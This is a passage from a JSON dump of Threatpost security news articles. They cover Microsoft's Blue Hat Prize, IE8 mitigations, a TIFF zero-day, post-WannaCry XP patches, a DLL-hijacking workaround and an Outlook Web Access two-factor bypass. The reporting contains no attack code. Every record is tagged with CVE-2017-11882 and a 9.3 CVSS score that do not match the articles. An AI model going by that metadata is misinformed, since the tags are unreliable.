"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "description": "Microsoft has announced the [three finalists](<http://www.microsoft.com/security/bluehatprize/finalists.aspx>) for its $200,000 [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) contest and all three of the researchers in the running for the win submitted technologies designed to defeat ROP (return-oriented programming) exploits. Each of the entrants takes a different tack with his ROP defense and it will be another month before Microsoft announces at Black Hat which of them will take home the $200,000 top prize.\n\nThe Blue Hat Prize, whcih Microsoft announced at Black Hat last summer, offers researchers cash prizes for innovative defensive technologies. In some ways, it is Microsoft\u2019s response to all of the bug-bounty programs that other vendors have started in the last couple of years. Companies such as Google, Barracuda, Firefox and others have been paying researchers varying amounts for vulnerabilities that researchers disclose to them privately. Microsoft officials have said repeatedly that the company will not pay bug bounties and instead introduced Blue Hat Prize to spur innovation in defensive technologies.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group, said at the time of the initial announcement last year. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nOne of the problems that Microsoft officials mentioned as being ripe for innovations is that of ROP exploits. The three finalists for the first Blue Hat Prize are Jared DeMott, Ivan Fratric and Vasillis Pappas. Each of them submitted techniques for defeating or mitigating ROP exploits. Under the rules of the contest, the researcher who wins the top prize will have to agree to license the technology to Microsoft, but he will retain the rights to the technology, as well. \n\n\u201c[We received 20 entries](<http://blogs.technet.com/b/ecostrat/archive/2012/04/04/bluehat-prize-entries-the-final-tally-is.aspx>) to our inaugural BlueHat Prize contest, a response and participation from the security research community that exceeded our expectations. We now know contestants emerged from different areas of the security community \u2013 some from academia, some recognized names in the hacker community, and some from other venues entirely,\u201d [Moussouris](<http://blogs.technet.com/b/ecostrat/>) wrote on Thursday.\n\nThe winner, who will get $200,000, will be announced at the company\u2019s party at Black Hat in July. The second prize winner will get $50,000 and the third-prize winner gets an MSDN subscription. All three will fly to Las Vegas on Microsoft\u2019s dime for the announcement.\n", "cvss3": {}, "published": "2012-06-21T15:41:28", "type": "threatpost", "title": "Microsoft Reveals Blue Hat Prize Finalists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:59", "id": "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "href": "https://threatpost.com/microsoft-reveals-blue-hat-prize-finalists-062112/76722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:24", "description": "[](<https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/>)\n\nWhen Mark Dowd and Alex Sotirov demonstrated a technique for [bypassing Vista\u2019s memory protections](<http://taossa.com/archive/bh08sotirovdowd.pdf>) at Black Hat last year, the security community was stunned. Microsoft officials said at the time they were working on ways to defeat the pair\u2019s attack and now that protection has arrived, in the form of Internet Explorer 8.\n\nDowd (above, right), who works for IBM ISS in Australia, says in a blog post that the improvements that Microsoft has made in the [security of IE 8](<http://blogs.iss.net/archive/chicksdigIE8.html>) have the effect of preventing the memory-bypass attacks from working.\n\n\u201cBasically, the fix is simple: Loading .NET controls has been associated with a special privilege that users can enable or disable \u2013 and in the default configuration for the \u201cInternet Zone\u201d (the Medium-High setting), .NET controls have been disabled,\u201d Dowd writes.\n\nThe attack that Dowd and Sotirov (above, left) showed off at Black Hat was complex, but the basic premise is that they were able to load a .Net control onto a Web page into a location of their choosing, and with whatever permissions they chose. This allowed them to get around two of the main memory protections in Windows Vista, ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). These two technologies are a major part of the security upgrades that Microsoft added to Vista, and Dowd and Sotirov\u2019s attack was seen as a breakthrough.\n\nBut now, with the addition of the new permission to IE 8, Microsoft has put a stop to that particular attack. As [Jonathan Ness](<http://blogs.technet.com/srd/archive/2009/03/23/released-build-of-internet-explorer-8-blocks-dowd-sotirov-aslr-dep-net-bypass.aspx>) of the Microsoft Security Response Center writes in his blog on IE 8 security, \u201cThe final release of Internet Explorer 8 on Windows Vista blocks the .NET DEP+ASLR bypass mechanism from malicious websites on the Internet. Specifically, IE8 created a new URLAction that regulates loading of the .NET MIME filter. By default, the URLAction prevents it from loading in the Internet and Restricted Sites Zones. The .NET MIME filter is allowed to load by default in the Intranet Zone.\u201d \n\n\n\nThis is a nice advance for Microsoft and for its customers. IE for years has been seen as by far the least secure of the major browsers, but that perception may be shifting now. At last week\u2019s CanSecWest conference, the hackers in the Pwn2Own contest went right after Safari, believing that IE 8 on Vista was too tough to crack. It eventually went down, surprising many of the researchers in attendance.\n\nThis is all to the good, as Dowd writes.\n\n\u201cSo, the net effect (no pun intended) of this change is that by default, our technique will no longer work in its current form against IE8 browsers in their default configuration. There are also a number of other security enhancements in IE8,\u201d he writes. \u201cMost notably, the browser now runs in \u2018Protected Mode.\u2019 Essentially, this means that the browsing process runs in a sandbox of sorts with a restricted set of privileges. (Internally, this is implemented by utilizing Vista\u2019s \u2018Low Integrity\u2019 mode and communicating to a broker process via an out of process COM server. But, that is the topic of another post.) Furthermore, DEP has been enabled in IE8, which is a big change from IE7. This means that IE8 now fully reaps the benefits of the Vista memory protections. Hacking it is going to be hard! .. Probably!\u201d\n", "cvss3": {}, "published": "2009-03-26T18:27:42", "type": "threatpost", "title": "IE8 security stops memory bypass attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "href": "https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/72537/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights&lt;\u2018 Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:32", "description": "Microsoft gave its users steps earlier this week to sidestep a vulnerability in one of Oracle\u2019s Outside In libraries. The company published some mitigations for the bug, but said it isn\u2019t aware of any active attacks against it yet.\n\nThe Oracle technology is licensed by software developers like Microsoft to transform and control different types of file formats. Outside In is present in Microsoft\u2019s Exchange Server 2007, Exchange Server 2010 and FAST Search Server for Sharepoint products. The vulnerability was initially highlighted in [Oracle\u2019s Critical Patch Update Advisory for this month](<http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html>).\n\nIn a [post on its Technet blog](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>), Dave Forstrom of the Trustworthy Computing claimed Microsoft isn\u2019t aware of any active exploits against the vulnerability but insisted following the workaround would be the best practice for users until an adequate security update was developed.\n\n[A separate blog post](<http://blogs.technet.com/b/srd/archive/2012/07/24/more-information-on-security-advisory-2737111.aspx>) by Microsoft\u2019s Security and Defense team explains the best way to minimize risk is disabling WebReady Document Viewing on the VDir of all CAS servers. This will circumvent a problem that lies in the way WebReady Document Viewing renders certain attachments as a web page \u201cinstead of relying on local applications to open/view it,\u201d according to the post.\n\nFor more on this, including a more in depth explanation of the Oracle flaw, head to [Technet](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>).\n", "cvss3": {}, "published": "2012-07-26T16:34:25", "type": "threatpost", "title": "Microsoft Publishes Workaround for Oracle Outside In Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:105BBC66E564BD98581E52653F5EA865", "href": "https://threatpost.com/microsoft-publishes-workaround-oracle-outside-vulnerability-072612/76854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. \u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:06", "description": "Microsoft has released some [updated guidance on the recent DLL-hijacking bug](<http://blogs.technet.com/b/srd/>), including a new FixIt tool that enables the workaround for the vulnerability that Microsoft shipped late last month. \n\nThe new guidance includes a detailed explanation of the bug itself as well as how potential attacks would work and what users can do to protect themselves. In a blog post, Jonathan Ness of the Microsoft Security Response Center Engineering Team, explained that there are a number of different potential attack vectors, including a WebDAV share.\n\n\u201cUnfortunately, based on attack patterns we have seen in recent years, \nwe believe it is no longer safe to browse to a malicious, untrusted \nWebDAV server in the Internet Zone and double-click on **_any_** \ntype of files. Attackers are clever, substituting dangerous file icons \nwith safe, trusted file icons. They have even recently begun obfuscating \nthe filename based on character encoding tricks (such as right-to-left \ncharacter encoding). Their goal is to entice unsuspecting users into \ndouble-clicking on a malicious executable. With or without this new \nremote vector to the DLL Preloading issue, it\u2019s very hard to make a \ntrust decision given the amount of control an attacker has over the \nmalicious WebDAV server browsing experience. We recommend users only \ndouble-click on file icons from WebDAV shares known to be trusted, safe, \nand not under the control of a malicious attacker,\u201d Ness said.\n\nThe company has released a workaround for the DLL bug, which involved editing the registry to create a new entry. The solution also includes a downloadable tool. But the tool was turned off by default, fo Microsoft has now published a new FixIt tool that will automatically enable it.\n\nHere are the steps that Microsoft recommends:\n\n * Install the tool from [KB2264107](<http://support.microsoft.com/kb/2264107>).\n * Log on to your computer as an administrator. \n * Open Registry Editor. \n * Locate and then click the following registry subkey: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager\n * Right-click Session Manager, point to New, and then click Dword Value.\n * Type CWDIllegalInDllSearch, and then click Modify. \n * In the Value data box, type 0xFFFFFFFF, and then click OK.\n\nThe company warns that there could be unforeseen issues, so users should test the fix before deploying it. \n", "cvss3": {}, "published": "2010-09-01T13:38:15", "type": "threatpost", "title": "Microsoft Publishes New FixIt Tool For DLL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:11", "id": "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "href": "https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/74409/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:25", "description": "Microsoft has hired yet another well-known security researcher to join its ever-growing team of exploit and defense experts. This time it\u2019s Ken Johnson, known in the hacker world as [Skywing](<http://www.nynaeve.net/>). Johnson is known as an expert on debugging and reverse engineering, and has done a tremendous amount of work [tearing apart Windows defenses](<http://www.uninformed.org/?v=2&a=4>) specifically.\n\nBefore moving to Microsoft, Johnson was working for Positive Networks, a VPN provider. In a [blog post](<http://blogs.msdn.com/michael_howard/archive/2009/03/24/ken-johnson-skywing-joins-microsoft.aspx>) announcing Johnson\u2019s hiring, Microsoft software security guru Mike Howard praised Johnson\u2019s experience and skill. \n\n\u201cKen brings an enormous amount of reverse engineering and defense-subversion skill to Microsoft. Ken will be working on anything and everything related vulnerabilities, exploits, defenses, bypassing defenses and more,\u201d Howard said.\n\nJohnson\u2019s hiring is the latest in a series of interesting personnel moves for Microsoft\u2019s security group. The changes essentially began about three years ago when Adam Shostack joined Microsoft. Shostack is a well-known security and privacy expert and had spent years in start-ups and smaller organizations and was not afraid to be critical of Microsoft\u2019s policies. \n\n\u201cIn the past, I\u2019ve [heaped scorn](<http://www.securityfocus.com/news/315>) on Microsoft\u2019s security related decisions. Over the last few years, I\u2019ve watched Microsoft embrace security. I\u2019ve watched them make very large investments in security, including hiring my friends and colleagues. And really, I\u2019ve watched them produce results,\u201d Shostack wrote in a [blog post at the time of his hiring at Microsoft](<http://www.emergentchaos.com/archives/2006/06/im_joining_microsoft.html>). \n\nThen in January 2008 Microsoft hired Crispin Cowan, an expert on Linux and open-source security and was the brains behind the Immunix security-enhanced Linux distribution. And a few months later Matt Miller joined Microsoft, as well. Known as [Skape](<http://hick.org/~mmiller/>), Miller was a big part of HD Moore\u2019s [Metasploit Project](<http://metasploit.org/>) team and is known for his work on exploitation techniques.\n\nGiven the emphasis that Microsoft has placed on anti-exploitation and memory protection in its most recent releases, including Vista and Internet Explorer 8, it stands to reason that the company will continue to bring in more of the people who have done work on the other side of that fence. There\u2019s no defense like a good offense. \n", "cvss3": {}, "published": "2009-03-25T15:27:43", "type": "threatpost", "title": "Ken \"Skywing\" Johnson joins Microsoft security team", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:29", "id": "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "href": "https://threatpost.com/ken-skywing-johnson-joins-microsoft-security-team-032509/72482/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:02", "description": "Threat modeling has been part of the security culture at Microsoft for the better part of a decade, an important piece of the Security Development Lifecycle that\u2019s at the core of Trustworthy Computing.\n\nToday, Microsoft updated its free Threat Modeling Tool with a number of enhancements that bring the practice closer to not only large enterprises, but also smaller companies with a growing target on their back.\n\nFour new features have been added to the tool, including enhancements to its visualization capabilities, customization features older models and threat definitions, as well as a change to it generates threats.\n\n\u201cMore and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating,\u201d said Tim Rains, a Trustworthy Computing manager. \u201cThreat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.\u201d\n\nThe first iteration of Microsoft Threat Modeling Tool was issued in 2011, but Rains said customer feedback and suggestions for improvements since then have been rolled into this update. The improvements include a new drawing surface that no longer requires Microsoft Visio to build data flow diagrams. The update also includes the ability migrate older, existing threat models built with version 3.1.8 to the new format. Users can also upload existing custom-built threat definitions into the tool, which also comes with its own definitions.\n\nThe biggest change in the new version is in its threat-generation logic. Where previous versions followed [the STRIDE framework](<http://msdn.microsoft.com/en-us/magazine/cc163519.aspx>) (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege) per element, this one follows STRIDE per interaction of those elements. STRIDE helps users map threats to the properties guarding against them, for example, spoofing maps to authentication.\n\n\u201cWe take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements,\u201d Rains said.\n\nAt the RSA Conference in February, Trustworthy Computing program manager Adam Shostack said that there is [no one defined way to model threats](<http://threatpost.com/threat-modeling-legos-and-dancing-babies/104517>); that they must be specific to organizations and their particular risks.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d Shostack said. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n", "cvss3": {}, "published": "2014-04-15T15:07:23", "type": "threatpost", "title": "Microsoft Releases Free Threat Modeling Tool 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-17T19:50:40", "id": "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "href": "https://threatpost.com/microsoft-releases-updated-threat-modeling-tool-2014/105467/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "Microsoft\u2019s research unit is investing resources in a new Web browser that could eventually signal a shift away from the ubiquitous Internet Explorer.\n\nAccording to a research paper released this week, the project is called Gazelle and is positioned as a secure web browser constructed as a multi-principal operating system.\n\nFrom [the research paper](<http://research.microsoft.com/pubs/79655/gazelle.pdf>) (.pdf):\n\nGazelle\u2019s Browser Kernel is an operating system that exclusively manages resource protection and sharing across web site principals. This construction exposes intricate design issues that no previous work has identified, such as legacy protection of cross-origin script source, and cross-principal, cross-process display and events protection. We elaborate on these issues and provide comprehensive solutions.\n\nOur prototype implementation and evaluation experience indicates that it is realistic to turn an existing browser into a multi-principal OS that yields significantly stronger security and robustness with acceptable performance and backward compatibility.\n\nMore [at Slashdot](<http://tech.slashdot.org/article.pl?sid=09/02/22/1724244>).\n", "cvss3": {}, "published": "2009-03-03T20:45:46", "type": "threatpost", "title": "Microsoft researching new (secure) browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:39", "id": "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "href": "https://threatpost.com/microsoft-researching-new-secure-browser-030309/72358/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "Microsoft announced yesterday that it will complement the [two-factor authentication](<http://threatpost.com/microsoft-reportedly-adding-two-factor-authentication-user-accounts-041013>) it enabled for account holders in April with [additional security features](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-features-added-to-microsoft-accounts.aspx>) designed to deny account hijacking and unauthorized access.\n\nWindows PC and mobile users, along with Outlook, SkyDrive, Xbox, Skype and other Microsoft services users will soon have three new capabilities to further prop up their accounts.\n\nThe most novel may be a dashboard view that presents a user with a log of recent activity, such as log-in attempts\u2014including failed attempts\u2014as well as the addition or deletion of security information and the type of device and browser used for a particular activity. Location is displayed on a map, as well as timestamp data.\n\n\u201cYou know best what\u2019s been happening with your account \u2013 so the more we give you tools to understand what\u2019s happening, the better we can work together to protect your account,\u201d wrote Eric Doerr, a group program manager at Microsoft. \u201cFor example, a login from a new country might look suspicious to us, but you might know that you were simply on vacation or on a business trip.\u201d\n\nUsers who determine there has been suspicious or unauthorized activity can click on a \u201cThis wasn\u2019t me\u201d button that will then display steps the user can take to secure their accounts.\n\nIn addition, users who have already enabled [two-factor authentication](<http://blogs.technet.com/b/microsoft_blog/archive/2013/04/17/microsoft-account-gets-more-secure.aspx>) will be able to generate a recovery code to access their accounts without having to use the information provided during the setup of two-factor.\n\n\u201cBecause two-step verification setup requires two verified pieces of security information, like a phone number and email address, it will be a rare occasion when both options fail, but in the event they do, we\u2019ve got you covered,\u201d Doerr said.\n\nMicrosoft said that any account user will be add a recovery code to their account, but users will be able to request only one recovery code at a tme; requesting a new one cancels the old one, Doerr said.\n\n\u201cYour recovery code is like a spare key to your house,\u201d Doerr said. \u201cSo make sure you store it in a safe place.\u201d\n\nThe final new feature users may expect is additional management of security notifications, such as password resets. Users will be able to select, for example, whether they want security notifications send to an email address or a mobile device via text message.\n\nMicrosoft account holders have had two-factor authentication at their disposal since April. Users are asked to provide two pieces of security information that Microsoft stores; the user will enter a password, for example, and then have a code sent to their mobile device as a second authenticator.\n\nMicrosoft also released an Authenticator app for Windows Phone; the app is built on a standard authentication protocol meaning that it could be used on other Web-based services such as those offered by Google, Dropbox and others.\n", "cvss3": {}, "published": "2013-12-10T08:00:18", "type": "threatpost", "title": "Microsoft Protects User Accounts with New Security Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-10T00:55:21", "id": "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "href": "https://threatpost.com/microsoft-adds-new-security-features-to-accounts/103138/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Enterprises running Exchange Server have been operating under a false sense of security with regard to two-factor authentication implementations on Outlook Web Access (OWA) adding an extra layer of protection.\n\nA design weakness has been exposed that can allow an attacker to easily bypass 2FA and access an organization\u2019s email inboxes, calendars, contacts and more.\n\nThe problem lies in the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA and it is [not covered by two-factor authentication](<http://www.blackhillsinfosec.com/?p=5396>). EWS is enabled by default and shares the same port and server as OWA, meaning an attacker with [stolen] credentials can remotely access EWS, which talks to the same backend infrastructure as OWA, and would enable access a user\u2019s inbox.\n\nThe issue was publicly disclosed on Wednesday by researcher Beau Bullock of Black Hills Information Security, a consultancy based in South Dakota. Bullock privately disclosed his findings to Microsoft on Sept. 28, and after an initial acknowledgement, repeated follow-up emails failed to produce a patch or mitigation. Bullock went public yesterday, but shortly thereafter, Microsoft contacted him with a mitigation that would likely break some services that rely on Exchange Web Services, such as thick clients like Outlook for Mac.\n\nBullock told Threatpost that it\u2019s likely Microsoft cannot fix this without re-architecting some parts of the affected infrastructure.\n\n\u201cThe biggest thing is that Outlook Web Access is on the same webserver as Exchange Web Services and they\u2019re both enabled by default. I think the biggest problem is that most people don\u2019t seem to understand that\u2019s the thing that\u2019s happening,\u201d Bullock said. \u201cA lot of people think they have this Exchange server on the Internet and they have it there just for OWA, but the biggest problem is they don\u2019t understand EWS is enabled by default as well. The fix is more widespread awareness that it\u2019s actually there.\u201d\n\nBullock, a penetration tester, believes that there isn\u2019t a lot of awareness that this configuration exists and that organizations aren\u2019t aware that this second protocol is running alongside OWA and is not covered by 2FA.\n\n\u201cThat\u2019s not inherently clear in the documentation that if you enable two-factor authentication on OWA, you have to be careful that you have this other protocol right here that is still only single factor,\u201d Bullock said. \u201cIt talks to same backend infrastructure.\u201d\n\nBullock pointed out that it\u2019s not unusual to have different protocols, such as RDP and SMB, running on the same server where, for example, RDP is covered by two-factor authentication and SMB is not. The two services, however, are not running on the same port, and Bullock points out that an enterprise could create firewall rules to curtail access.\n\n\u201cThat\u2019s why this is more of a serious issue,\u201d Bullock explained. \u201cWhen you expose a server externally, you allow access only to that port. If you don\u2019t know a completely separate protocol is operating on same port, you\u2019re potentially opening up another way to communicate to that infrastructure.\u201d\n\nBullock described in a report published yesterday how he carried out the attack against OWA protected by Duo for Outlook 2FA. \nBy targeting EWS with his test account\u2019s credentials and a pen-testing tool called MailSniper, which connects to Exchange and searches an inbox for sensitive data, Bullock was able to bypass the 2FA protecting OWA. An attacker in a real-world scenario could gain access to a user\u2019s credentials, for example, from any of the tens of millions of credentials dumped online this summer.\n\nTo confirm that this wasn\u2019t an issue with Duo for Outlook, Bullock ran a similar test against Office 365 with Microsoft Azure Multifactor Authentication enabled. Using the same attack, he was able to bypass that 2FA as well, Bullock said.\n\n\u201cThis does not affect Office 365 with multi-factor authentication (MFA) fully enabled. What the blog describes is not a software vulnerability and does not work without user account credentials/stolen passwords,\u201d a Microsoft spokesperson told Threatpost.\n\n\u201cI think in the end, the best solution would be to re-architect it,\u201d Bullock said. \u201cIn the short term, how hard would it be for Microsoft to disable it by default and if an organization actually needed to use EWS for a thick client, then they could enable it. They\u2019re trying to keep all the protocols open and make it easier for deployment.\u201d\n", "cvss3": {}, "published": "2016-11-03T15:15:56", "type": "threatpost", "title": "Outlook Web Access Two-Factor Authentication Bypass Exists", "bulletinFamily": "info", 